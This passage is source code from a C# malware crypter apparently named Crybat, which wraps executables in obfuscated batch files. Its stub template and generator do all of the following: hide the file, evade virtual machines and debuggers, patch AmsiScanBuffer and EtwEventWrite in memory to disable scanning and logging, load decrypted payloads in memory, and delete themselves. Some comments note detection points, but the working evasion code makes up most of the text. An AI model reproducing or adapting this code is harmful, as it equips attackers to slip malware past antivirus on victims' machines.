37 | instr.Insert(i + 3, OpCodes.Callvirt.ToInstruction(method.Module.Import(GetSystemMethod(typeof(string), "Replace", 1))));
38 | i += 3;
39 | }
40 | else if (instr[i].ToString().Contains("System.Reflection.Assembly::get_Location()"))
41 | {
42 | instr.Insert(i + 1, OpCodes.Ldstr.ToInstruction(".bat.exe"));
43 | instr.Insert(i + 2, OpCodes.Ldstr.ToInstruction(".bat"));
44 | instr.Insert(i + 3, OpCodes.Callvirt.ToInstruction(method.Module.Import(GetSystemMethod(typeof(string), "Replace", 1))));
45 | i += 3;
46 | }
47 | else if (instr[i].ToString().Contains("System.Reflection.Assembly::GetEntryAssembly()"))
48 | {
49 | instr[i] = OpCodes.Call.ToInstruction(method.Module.Import(GetSystemMethod(typeof(Assembly), "GetExecutingAssembly")));
50 | }
51 | }
52 | method.Body.SimplifyBranches();
53 | }
54 | }
55 | MemoryStream ms = new MemoryStream();
56 | module.Write(ms);
57 | byte[] output = ms.ToArray();
58 | ms.Dispose();
59 | return output;
60 | }
61 |
// Finds a method definition by name in the module that declares type and returns the idx-th
// match, or null when there is no match at all.
// Types are matched on simple name only (no namespace), and idx selects among overloads in
// the order the module lists them, so which overload "Replace", 1 denotes depends on the
// framework assembly loaded at build time.
// NOTE(review): methods[idx] throws when idx is not below the number of matches; the List
// type arguments are missing in this listing, probably lost in extraction.
62 | private static MethodDef GetSystemMethod(Type type, string name, int idx = 0)
63 | {
64 | string filename = type.Module.FullyQualifiedName;
65 | ModuleDefMD module = ModuleDefMD.Load(filename);
66 | TypeDef[] types = module.GetTypes().ToArray();
67 | List methods = new List();
68 | foreach (TypeDef t in types)
69 | {
70 | if (t.Name != type.Name) continue;
71 | foreach (var m in t.Methods)
72 | {
73 |
74 | if (m.Name != name) continue;
75 | methods.Add(m);
76 | }
77 | }
78 | if (methods.Count > 0) return methods[idx];
79 | return null;
80 | }
81 | }
82 | }
83 |
--------------------------------------------------------------------------------
/Crybat/packages.config:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Crybat/Properties/Resources.resx:
--------------------------------------------------------------------------------
106 | text/microsoft-resx
107 |
108 |
109 | 2.0
110 |
111 |
112 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
113 |
114 |
115 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
--------------------------------------------------------------------------------
/Crybat/Form1.resx:
--------------------------------------------------------------------------------
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
--------------------------------------------------------------------------------
/Crybat/CodeGen/StubGen.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 |
5 | using static Crybat.Utils;
6 |
7 | namespace Crybat
8 | {
9 | public class StubGen
10 | {
// Builds the single-line PowerShell command that FileGen.CreateBat embeds in the batch file.
//   key, iv - written into the stub as base64 literals (iv only in AES mode).
//   mode    - AES selects AESStub.ps1; any other value selects XORStub.ps1.
//   rng     - supplies a fresh 5-letter name for every *_var placeholder.
// Returns the stub with placeholders substituted and every Environment.NewLine removed.
// Detection notes, from the literals below:
//   * The three method names are replaced by reversed string literals that are the same in
//     every build ('gnirtS46esaBmorF', 'txeTllAdaeR', 'daoL', each followed by a negative
//     range index and -join ''), so they are usable as static strings once the batch
//     variables have been expanded, e.g. in process command lines or PowerShell script logs.
//   * Only variable names are randomised; type names such as GZipStream and AesManaged stay
//     in clear text in the stub templates.
11 | public static string CreatePS(byte[] key, byte[] iv, EncryptionMode mode, Random rng)
12 | {
// Neither of these two values is used below; the calls still advance rng.
13 | string frombase64string_var = RandomString(5, rng);
14 | string readalltext_var = RandomString(5, rng);
15 |
16 | string stubcode = string.Empty;
17 | if (mode == EncryptionMode.AES)
18 | {
19 | stubcode += GetEmbeddedString("Crybat.Resources.AESStub.ps1");
20 | stubcode = stubcode.Replace("FromBase64String", "('gnirtS46esaBmorF'[-1..-16] -join '')");
21 | stubcode = stubcode.Replace("ReadAllText", "('txeTllAdaeR'[-1..-11] -join '')");
22 | stubcode = stubcode.Replace("Load", "('daoL'[-1..-4] -join '')");
23 | stubcode = stubcode.Replace("DECRYPTION_KEY", Convert.ToBase64String(key));
24 | stubcode = stubcode.Replace("DECRYPTION_IV", Convert.ToBase64String(iv));
25 | stubcode = stubcode.Replace("contents_var", RandomString(5, rng));
// "lastline_var" has to be replaced before "line_var", which is a substring of it.
26 | stubcode = stubcode.Replace("lastline_var", RandomString(5, rng));
27 | stubcode = stubcode.Replace("line_var", RandomString(5, rng));
28 | stubcode = stubcode.Replace("payload_var", RandomString(5, rng));
29 | stubcode = stubcode.Replace("aes_var", RandomString(5, rng));
30 | stubcode = stubcode.Replace("decryptor_var", RandomString(5, rng));
31 | stubcode = stubcode.Replace("msi_var", RandomString(5, rng));
32 | stubcode = stubcode.Replace("mso_var", RandomString(5, rng));
33 | stubcode = stubcode.Replace("gs_var", RandomString(5, rng));
34 | stubcode = stubcode.Replace("obfstep1_var", RandomString(5, rng));
35 | stubcode = stubcode.Replace("obfstep2_var", RandomString(5, rng));
36 | }
37 | else
38 | {
// Same substitutions for the XOR stub: no IV, and key_var in place of aes_var/decryptor_var.
39 | stubcode += GetEmbeddedString("Crybat.Resources.XORStub.ps1");
40 | stubcode = stubcode.Replace("FromBase64String", "('gnirtS46esaBmorF'[-1..-16] -join '')");
41 | stubcode = stubcode.Replace("ReadAllText", "('txeTllAdaeR'[-1..-11] -join '')");
42 | stubcode = stubcode.Replace("Load", "('daoL'[-1..-4] -join '')");
43 | stubcode = stubcode.Replace("DECRYPTION_KEY", Convert.ToBase64String(key));
44 | stubcode = stubcode.Replace("contents_var", RandomString(5, rng));
45 | stubcode = stubcode.Replace("lastline_var", RandomString(5, rng));
46 | stubcode = stubcode.Replace("line_var", RandomString(5, rng));
47 | stubcode = stubcode.Replace("payload_var", RandomString(5, rng));
48 | stubcode = stubcode.Replace("key_var", RandomString(5, rng));
49 | stubcode = stubcode.Replace("msi_var", RandomString(5, rng));
50 | stubcode = stubcode.Replace("mso_var", RandomString(5, rng));
51 | stubcode = stubcode.Replace("gs_var", RandomString(5, rng));
52 | stubcode = stubcode.Replace("obfstep1_var", RandomString(5, rng));
53 | stubcode = stubcode.Replace("obfstep2_var", RandomString(5, rng));
54 | }
// The stub statements end in ';', so the script still parses as one line.
55 | stubcode = stubcode.Replace(Environment.NewLine, string.Empty);
56 | return stubcode;
57 | }
58 |
/// <summary>
/// Builds the C# source text of the loader stub from the embedded template
/// "Crybat.Resources.Stub.cs": preprocessor symbols are prepended according to
/// the flags, and the template's placeholder tokens are substituted.
/// </summary>
/// <param name="key">Key passed to Encrypt for the string constants; also embedded in the output as base64.</param>
/// <param name="iv">IV passed to Encrypt; also embedded in the output as base64.</param>
/// <param name="mode">Selects the XOR_ENCRYPT or AES_ENCRYPT symbol and is forwarded to Encrypt.</param>
/// <param name="antidebug">When true, defines ANTI_DEBUG in the generated source.</param>
/// <param name="antivm">When true, defines ANTI_VM in the generated source.</param>
/// <param name="native">When true, defines USE_RUNPE in the generated source.</param>
/// <param name="rng">Random source handed to RandomString for the generated identifiers.</param>
/// <returns>The complete stub source: the #define lines followed by the substituted template.</returns>
public static string CreateCS(byte[] key, byte[] iv, EncryptionMode mode, bool antidebug, bool antivm, bool native, Random rng)
{
    // Every build gets fresh identifiers for the namespace, class, helper methods and
    // delegate types (RandomString is defined elsewhere; presumably it returns a
    // 20-character identifier - confirm). Analyst note: identifier names are therefore
    // not a stable signature for stubs produced by this generator.
    string namespacename = RandomString(20, rng);
    string classname = RandomString(20, rng);
    string aesfunction = RandomString(20, rng);
    string uncompressfunction = RandomString(20, rng);
    string gerfunction = RandomString(20, rng);
    string virtualprotect = RandomString(20, rng);
    string checkremotedebugger = RandomString(20, rng);
    string isdebuggerpresent = RandomString(20, rng);

    // Names of the two APIs the stub overwrites in memory, stored encrypted + base64.
    string amsiscanbuffer_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("AmsiScanBuffer"), key, iv));
    string etweventwrite_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("EtwEventWrite"), key, iv));

    // Remaining string constants of the stub, encoded the same way. The last one is the
    // prefix of the self-delete command line that the stub hands to cmd.exe.
    string checkremotedebugger_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("CheckRemoteDebuggerPresent"), key, iv));
    string isdebuggerpresent_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("IsDebuggerPresent"), key, iv));
    string payloadtxt_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("payload.exe"), key, iv));
    string runpedlltxt_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("runpe.dll"), key, iv));
    string runpeclass_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("runpe.RunPE"), key, iv));
    string runpefunction_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("ExecutePE"), key, iv));
    string cmdcommand_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("/c choice /c y /n /d y /t 1 & attrib -h -s \""), key, iv));
    // The key and IV are written into the same source file as the ciphertexts, so the
    // encryption only hides the strings from plain string searches; anyone holding the
    // compiled stub can recover them statically.
    string key_str = Convert.ToBase64String(key);
    string iv_str = Convert.ToBase64String(iv);

    string stub = string.Empty;
    string stubcode = GetEmbeddedString("Crybat.Resources.Stub.cs");

    // Conditional-compilation symbols are emitted ahead of the template text.
    // Exactly one of XOR_ENCRYPT / AES_ENCRYPT is always defined.
    if (antidebug) stub += "#define ANTI_DEBUG\n";
    if (antivm) stub += "#define ANTI_VM\n";
    if (native) stub += "#define USE_RUNPE\n";
    if (mode == EncryptionMode.XOR) stub += "#define XOR_ENCRYPT\n";
    else stub += "#define AES_ENCRYPT\n";
    // Plain substring replacement over the whole template text: every occurrence of a
    // placeholder spelling is rewritten, wherever it appears in the template.
    stubcode = stubcode.Replace("namespace_name", namespacename);
    stubcode = stubcode.Replace("class_name", classname);
    stubcode = stubcode.Replace("aesfunction_name", aesfunction);
    stubcode = stubcode.Replace("uncompressfunction_name", uncompressfunction);
    stubcode = stubcode.Replace("getembeddedresourcefunction_name", gerfunction);
    stubcode = stubcode.Replace("virtualprotect_name", virtualprotect);
    stubcode = stubcode.Replace("checkremotedebugger_name", checkremotedebugger);
    stubcode = stubcode.Replace("isdebuggerpresent_name", isdebuggerpresent);
    stubcode = stubcode.Replace("amsiscanbuffer_str", amsiscanbuffer_str);
    stubcode = stubcode.Replace("etweventwrite_str", etweventwrite_str);
    stubcode = stubcode.Replace("checkremotedebugger_str", checkremotedebugger_str);
    stubcode = stubcode.Replace("isdebuggerpresent_str", isdebuggerpresent_str);
    stubcode = stubcode.Replace("payloadtxt_str", payloadtxt_str);
    stubcode = stubcode.Replace("runpedlltxt_str", runpedlltxt_str);
    stubcode = stubcode.Replace("runpeclass_str", runpeclass_str);
    stubcode = stubcode.Replace("runpefunction_str", runpefunction_str);
    stubcode = stubcode.Replace("cmdcommand_str", cmdcommand_str);
    stubcode = stubcode.Replace("key_str", key_str);
    stubcode = stubcode.Replace("iv_str", iv_str);
    stub += stubcode;

    return stub;
}
114 | }
115 | }
--------------------------------------------------------------------------------
/Crybat/FodyWeavers.xsd:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks
13 |
14 |
15 |
16 |
17 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.
18 |
19 |
20 |
21 |
22 | A list of runtime assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks
23 |
24 |
25 |
26 |
27 | A list of runtime assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.
28 |
29 |
30 |
31 |
32 | A list of unmanaged 32 bit assembly names to include, delimited with line breaks.
33 |
34 |
35 |
36 |
37 | A list of unmanaged 64 bit assembly names to include, delimited with line breaks.
38 |
39 |
40 |
41 |
42 | The order of preloaded assemblies, delimited with line breaks.
43 |
44 |
45 |
46 |
47 |
48 | This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file.
49 |
50 |
51 |
52 |
53 | Controls if .pdbs for reference assemblies are also embedded.
54 |
55 |
56 |
57 |
58 | Controls if runtime assemblies are also embedded.
59 |
60 |
61 |
62 |
63 | Controls whether the runtime assemblies are embedded with their full path or only with their assembly name.
64 |
65 |
66 |
67 |
68 | Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.
69 |
70 |
71 |
72 |
73 | As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off.
74 |
75 |
76 |
77 |
78 | Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code.
79 |
80 |
81 |
82 |
83 | Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior.
84 |
85 |
86 |
87 |
88 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with |
89 |
90 |
91 |
92 |
93 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.
94 |
95 |
96 |
97 |
98 | A list of runtime assembly names to exclude from the default action of "embed all Copy Local references", delimited with |
99 |
100 |
101 |
102 |
103 | A list of runtime assembly names to include from the default action of "embed all Copy Local references", delimited with |.
104 |
105 |
106 |
107 |
108 | A list of unmanaged 32 bit assembly names to include, delimited with |.
109 |
110 |
111 |
112 |
113 | A list of unmanaged 64 bit assembly names to include, delimited with |.
114 |
115 |
116 |
117 |
118 | The order of preloaded assemblies, delimited with |.
119 |
120 |
121 |
122 |
123 |
124 |
125 |
126 | 'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed.
127 |
128 |
129 |
130 |
131 | A comma-separated list of error codes that can be safely ignored in assembly verification.
132 |
133 |
134 |
135 |
136 | 'false' to turn off automatic generation of the XML Schema file.
137 |
138 |
139 |
140 |
141 |
--------------------------------------------------------------------------------
/Crybat/Resources/Stub.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.IO;
4 | using System.IO.Compression;
5 | using System.Text;
6 | using System.Reflection;
7 | using System.Runtime.InteropServices;
8 | using System.Security.Cryptography;
9 | using System.Security.Principal;
10 | using System.Management;
11 | using System.Threading;
12 | using Microsoft.Win32;
13 |
14 | namespace namespace_name
15 | {
// Loader stub template. This file is not compiled as-is: the generator rewrites the
// lowercase placeholder tokens (type/method names and the quoted base64 arguments)
// by text substitution and prepends #define lines that select the #if branches below.
//
// Analyst summary of the run-time behaviour, in order: hide the executable, optional
// VM and debugger checks, in-process overwrite of AmsiScanBuffer and EtwEventWrite,
// drop-and-run of any extra embedded resources, in-memory load of the decrypted
// payload, then self-deletion through cmd.exe.
internal class class_name
{
    // Only these two kernel32 exports are declared as P/Invoke; every other native
    // function is resolved at run time through GetProcAddress, so it does not show up
    // as a P/Invoke declaration in the compiled stub's metadata.
    [DllImport("kernel32.dll")]
    static extern IntPtr LoadLibrary(string lpFileName);

    [DllImport("kernel32.dll")]
    static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    // Delegate shapes used with Marshal.GetDelegateForFunctionPointer below.
    delegate bool virtualprotect_name(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
#if ANTI_DEBUG
    delegate bool checkremotedebugger_name(IntPtr hProcess, ref bool isDebuggerPresent);
    delegate bool isdebuggerpresent_name();
#endif

    // Entry point of the generated stub. args[0], when present, is split on spaces
    // and forwarded to the payload.
    static void Main(string[] args)
    {
        // The stub marks its own image Hidden + System as its first action.
        string currentfilename = Process.GetCurrentProcess().MainModule.FileName;
        File.SetAttributes(currentfilename, FileAttributes.Hidden | FileAttributes.System);
#if ANTI_VM
        // Environment check: one WMI query against Win32_ComputerSystem. The process
        // exits with code 1 when Manufacturer/Model match the Hyper-V, VMware or
        // VirtualBox values tested here. Sandbox operators see this as an early exit
        // right after a WMI query and before any payload activity.
        ManagementObjectSearcher searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem");
        ManagementObjectCollection instances = searcher.Get();
        foreach (ManagementBaseObject inst in instances)
        {
            string manufacturer = inst["Manufacturer"].ToString().ToLower();
            if ((manufacturer == "microsoft corporation" && inst["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) || manufacturer.Contains("vmware") || inst["Model"].ToString() == "VirtualBox")
            {
                Environment.Exit(1);
            }
        }
        searcher.Dispose();
#endif

        // Module name is written as a concatenation of single-character literals.
        IntPtr kmodule = LoadLibrary("k" + "e" + "r" + "n" + "e" + "l" + "3" + "2" + "." + "d" + "l" + "l");

#if ANTI_DEBUG
        // Debugger checks: both kernel32 functions are looked up by a name that is
        // decrypted at run time, then combined with the managed Debugger.IsAttached.
        // Any positive result ends the process with exit code 1.
        IntPtr crdpaddr = GetProcAddress(kmodule, Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("checkremotedebugger_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))));
        IntPtr idpaddr = GetProcAddress(kmodule, Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("isdebuggerpresent_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))));
        checkremotedebugger_name CheckRemoteDebuggerPresent = (checkremotedebugger_name)Marshal.GetDelegateForFunctionPointer(crdpaddr, typeof(checkremotedebugger_name));
        isdebuggerpresent_name IsDebuggerPresent = (isdebuggerpresent_name)Marshal.GetDelegateForFunctionPointer(idpaddr, typeof(isdebuggerpresent_name));
        bool remotedebug = false;
        CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref remotedebug);
        if (Debugger.IsAttached || remotedebug || IsDebuggerPresent()) Environment.Exit(1);
#endif

        IntPtr vpaddr = GetProcAddress(kmodule, "V" + "i" + "r" + "t" + "u" + "a" + "l" + "P" + "r" + "o" + "t" + "e" + "c" + "t");
        virtualprotect_name VirtualProtect = (virtualprotect_name)Marshal.GetDelegateForFunctionPointer(vpaddr, typeof(virtualprotect_name));
        byte[] patch;
        uint old;

        // AMSI tampering: the first bytes of amsi.dll!AmsiScanBuffer in this process
        // are overwritten with "mov eax, 0x80070057 ; ret" (x64) or the same with
        // "ret 0x18" (x86), so every scan request returns E_INVALIDARG without being
        // scanned. 0x40 is PAGE_EXECUTE_READWRITE; the previous protection is restored
        // afterwards. Detection: compare the in-memory export prologue with the
        // on-disk image, and alert on protection changes to amsi.dll code pages.
        IntPtr amsimodule = LoadLibrary("a" + "m" + "s" + "i" + "." + "d" + "l" + "l");
        IntPtr asbaddr = GetProcAddress(amsimodule, Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("amsiscanbuffer_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))));
        if (IntPtr.Size == 8) patch = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
        else patch = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
        VirtualProtect(asbaddr, (UIntPtr)patch.Length, 0x40, out old);
        Marshal.Copy(patch, 0, asbaddr, patch.Length);
        VirtualProtect(asbaddr, (UIntPtr)patch.Length, old, out old);

        // ETW tampering: ntdll!EtwEventWrite is overwritten with an immediate return
        // ("ret" on x64, "ret 0x14" on x86), which silences user-mode ETW events
        // emitted by this process from here on. Detection: the same prologue
        // integrity check against ntdll.dll, or a managed process that stops
        // producing its expected runtime ETW events.
        IntPtr ntdll = LoadLibrary("n" + "t" + "d" + "l" + "l" + "." + "d" + "l" + "l");
        IntPtr etwaddr = GetProcAddress(ntdll, Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("etweventwrite_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))));
        if (IntPtr.Size == 8) patch = new byte[] { 0xC3 };
        else patch = new byte[] { 0xC2, 0x14, 0x00 };
        VirtualProtect(etwaddr, (UIntPtr)patch.Length, 0x40, out old);
        Marshal.Copy(patch, 0, etwaddr, patch.Length);
        VirtualProtect(etwaddr, (UIntPtr)patch.Length, old, out old);

        // Resource names of the encrypted payload and of the optional native loader.
        string payloadstr = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("payloadtxt_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str")));
        string runpestr = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("runpedlltxt_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str")));

        // Every other embedded resource is written unmodified to a relative path equal
        // to its resource name (i.e. the current working directory), marked
        // Hidden + System, started, and deleted once the started process exits.
        // These files are the only part of the chain that touches disk in the clear.
        Assembly asm = Assembly.GetExecutingAssembly();
        foreach (string name in asm.GetManifestResourceNames())
        {
            if (name == payloadstr || name == runpestr) continue;
            File.WriteAllBytes(name, getembeddedresourcefunction_name(name));
            File.SetAttributes(name, FileAttributes.Hidden | FileAttributes.System);
            new Thread(() =>
            {
                Process.Start(name).WaitForExit();
                File.SetAttributes(name, FileAttributes.Normal);
                File.Delete(name);
            }).Start();
        }

        // Payload pipeline: embedded resource -> decrypt -> gunzip, all in memory.
        byte[] payload = uncompressfunction_name(aesfunction_name(getembeddedresourcefunction_name(payloadstr), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str")));
        string[] targs = new string[] { };
        try
        {
            // Only the first command-line argument is used; a missing argument is
            // swallowed by the empty catch and leaves targs empty.
            targs = args[0].Split(' ');
        }
        catch { }

#if USE_RUNPE
        // Native payload path: the bundled helper assembly is decrypted, loaded from a
        // byte array and invoked through reflection with (own path without extension,
        // payload bytes, arguments). The type and method names are decrypted at run
        // time; what the helper does is not visible in this file.
        Assembly runpe = Assembly.Load(uncompressfunction_name(aesfunction_name(getembeddedresourcefunction_name(runpestr), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str"))));
        string runpeclass = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("runpeclass_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str")));
        string runpefunction = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("runpefunction_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str")));
        runpe.GetType(runpeclass).GetMethod(runpefunction).Invoke(null, new object[]
        {
            Path.ChangeExtension(currentfilename, null),
            payload,
            targs
        });
#else
        // Managed payload path: the assembly is loaded from the byte array (no file on
        // disk) and its entry point is invoked. Any exception from the first call,
        // including one thrown by the payload itself, leads to a second invocation
        // without arguments.
        MethodInfo entry = Assembly.Load(payload).EntryPoint;
        try { entry.Invoke(null, new object[] { targs }); }
        catch { entry.Invoke(null, null); }
#endif
        // Self-removal: a hidden cmd.exe child receives the decrypted command prefix
        // followed by this executable's path and a "del" of the same path. The child
        // process command line is observable in process-creation telemetry.
        string cmdstr = Encoding.UTF8.GetString(aesfunction_name(Convert.FromBase64String("cmdcommand_str"), Convert.FromBase64String("key_str"), Convert.FromBase64String("iv_str")));
        Process.Start(new ProcessStartInfo()
        {
            Arguments = cmdstr + currentfilename + "\" & del \"" + currentfilename + "\"",
            WindowStyle = ProcessWindowStyle.Hidden,
            CreateNoWindow = true,
            FileName = "cmd.exe"
        });
    }

    // Decrypts input with the scheme selected at generation time.
    // AES_ENCRYPT: AES in CBC mode with PKCS7 padding; returns a new array.
    // XOR_ENCRYPT: repeating-key XOR applied in place; the input array itself is
    // modified and returned, and iv is unused.
    // The generator defines exactly one of the two symbols.
    static byte[] aesfunction_name(byte[] input, byte[] key, byte[] iv)
    {
#if AES_ENCRYPT
        AesManaged aes = new AesManaged();
        aes.Mode = CipherMode.CBC;
        aes.Padding = PaddingMode.PKCS7;
        ICryptoTransform decryptor = aes.CreateDecryptor(key, iv);
        byte[] decrypted = decryptor.TransformFinalBlock(input, 0, input.Length);
        decryptor.Dispose();
        aes.Dispose();
        return decrypted;
#endif
#if XOR_ENCRYPT
        for (int i = 0; i < input.Length; i++)
        {
            input[i] = (byte)(input[i] ^ key[i % key.Length]);
        }
        return input;
#endif
    }

    // Inflates a GZip-compressed buffer and returns the decompressed bytes.
    static byte[] uncompressfunction_name(byte[] bytes)
    {
        MemoryStream msi = new MemoryStream(bytes);
        MemoryStream mso = new MemoryStream();
        GZipStream gs = new GZipStream(msi, CompressionMode.Decompress);
        gs.CopyTo(mso);
        gs.Dispose();
        mso.Dispose();
        msi.Dispose();
        // MemoryStream.ToArray remains usable after the stream has been disposed.
        return mso.ToArray();
    }

    // Returns the full contents of the named manifest resource of this assembly.
    // GetManifestResourceStream returns null for an unknown name; that case is not
    // handled here.
    static byte[] getembeddedresourcefunction_name(string name)
    {
        Assembly asm = Assembly.GetExecutingAssembly();
        MemoryStream ms = new MemoryStream();
        Stream stream = asm.GetManifestResourceStream(name);
        stream.CopyTo(ms);
        stream.Dispose();
        byte[] ret = ms.ToArray();
        ms.Dispose();
        return ret;
    }
}
176 | }
--------------------------------------------------------------------------------
/Crybat/Form1.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.CodeDom.Compiler;
3 | using System.Collections.Generic;
4 | using System.Diagnostics;
5 | using System.IO;
6 | using System.Net;
7 | using System.Security.Cryptography;
8 | using System.Text;
9 | using System.Threading.Tasks;
10 | using System.Windows.Forms;
11 | using Microsoft.CSharp;
12 |
13 | using static Crybat.Utils;
14 |
15 | namespace Crybat
16 | {
// Main window of the builder. It collects the input executable, option flags and
// key material, then drives the build in Crypt(): encrypt the input, generate and
// compile the loader stub around it, encrypt the compiled stub, and write a batch
// file that carries the encrypted stub as a comment line.
public partial class Form1 : Form
{
    public Form1()
    {
        InitializeComponent();
    }

    // Event handlers
    // Restores saved settings, starts the version check on a background task and
    // fills the key/IV text boxes with fresh values.
    private void Form1_Load(object sender, EventArgs e)
    {
        SettingsObject obj = Settings.Load();
        if (obj != null) UnpackSettings(obj);
        Task.Factory.StartNew(CheckVersion);
        UpdateKeys(sender, e);
    }

    // Persists the current settings, then terminates the process.
    private void Form1_FormClosing(object sender, FormClosingEventArgs e)
    {
        Settings.Save(PackSettings());
        Environment.Exit(0);
    }

    // Lets the user pick the input file and copies its path into textBox1.
    private void openButton_Click(object sender, EventArgs e)
    {
        OpenFileDialog ofd = new OpenFileDialog();
        ofd.RestoreDirectory = true;
        if (ofd.ShowDialog() != DialogResult.OK) return;
        textBox1.Text = ofd.FileName;
    }

    private void buildButton_Click(object sender, EventArgs e) => Crypt();

    // The two encryption check boxes are kept mutually exclusive by these handlers.
    private void aesEncryption_CheckedChanged(object sender, EventArgs e)
    {
        if (aesEncryption.Checked) xorEncryption.Checked = false;
    }

    private void xorEncryption_CheckedChanged(object sender, EventArgs e)
    {
        if (xorEncryption.Checked) aesEncryption.Checked = false;
    }

    // Adds a file path to listBox1; Crypt() embeds each listed file into the stub.
    private void addFile_Click(object sender, EventArgs e)
    {
        OpenFileDialog ofd = new OpenFileDialog();
        ofd.RestoreDirectory = true;
        if (ofd.ShowDialog() != DialogResult.OK) return;
        listBox1.Items.Add(ofd.FileName);
    }

    private void removeFile_Click(object sender, EventArgs e)
    {
        listBox1.Items.Remove(listBox1.SelectedItem);
    }

    // Functions
    // Runs the whole build on the calling (UI) thread and reports progress in listBox2.
    private void Crypt()
    {
        buildButton.Enabled = false;
        tabControl1.SelectedTab = tabControl1.TabPages["outputPage"];
        listBox2.Items.Clear();

        // Two independent key/IV pairs are read from the text boxes: key1/iv1 protect
        // the compiled stub inside the batch file, key2/iv6 protect the payload and
        // the string constants inside the stub. The text boxes are user-editable;
        // Convert.FromBase64String throws on malformed input and is not guarded here.
        Random rng = new Random();
        string _input = textBox1.Text;
        byte[] _key = Convert.FromBase64String(key1.Text);
        byte[] _iv = Convert.FromBase64String(iv1.Text);
        byte[] _stubkey = Convert.FromBase64String(key2.Text);
        byte[] _stubiv = Convert.FromBase64String(iv6.Text);
        EncryptionMode mode = xorEncryption.Checked ? EncryptionMode.XOR : EncryptionMode.AES;

        if (!File.Exists(_input))
        {
            MessageBox.Show("Invalid input path.", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
            buildButton.Enabled = true;
            return;
        }
        // Case-sensitive extension comparison: only a lowercase ".exe" is accepted.
        if (Path.GetExtension(_input) != ".exe")
        {
            MessageBox.Show("Invalid input file.", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
            buildButton.Enabled = true;
            return;
        }

        Console.ForegroundColor = ConsoleColor.Gray;
        byte[] pbytes = File.ReadAllBytes(_input);
        // IsAssembly comes from Crybat.Utils (not shown here); presumably it reports
        // whether the input is a .NET assembly - confirm against Utils.cs.
        bool isnetasm = IsAssembly(_input);

        if (isnetasm)
        {
            listBox2.Items.Add("Patching assembly...");
            pbytes = Patcher.Fix(pbytes);
        }

        listBox2.Items.Add("Encrypting payload...");
        byte[] payload_enc = Encrypt(mode, Compress(pbytes), _stubkey, _stubiv);

        listBox2.Items.Add("Creating stub...");
        string stub = StubGen.CreateCS(_stubkey, _stubiv, mode, antiDebug.Checked, antiVM.Checked, !isnetasm, rng);

        // The encrypted payload (and the encrypted helper DLL for non-.NET inputs) is
        // written to the current working directory under fixed names so the compiler
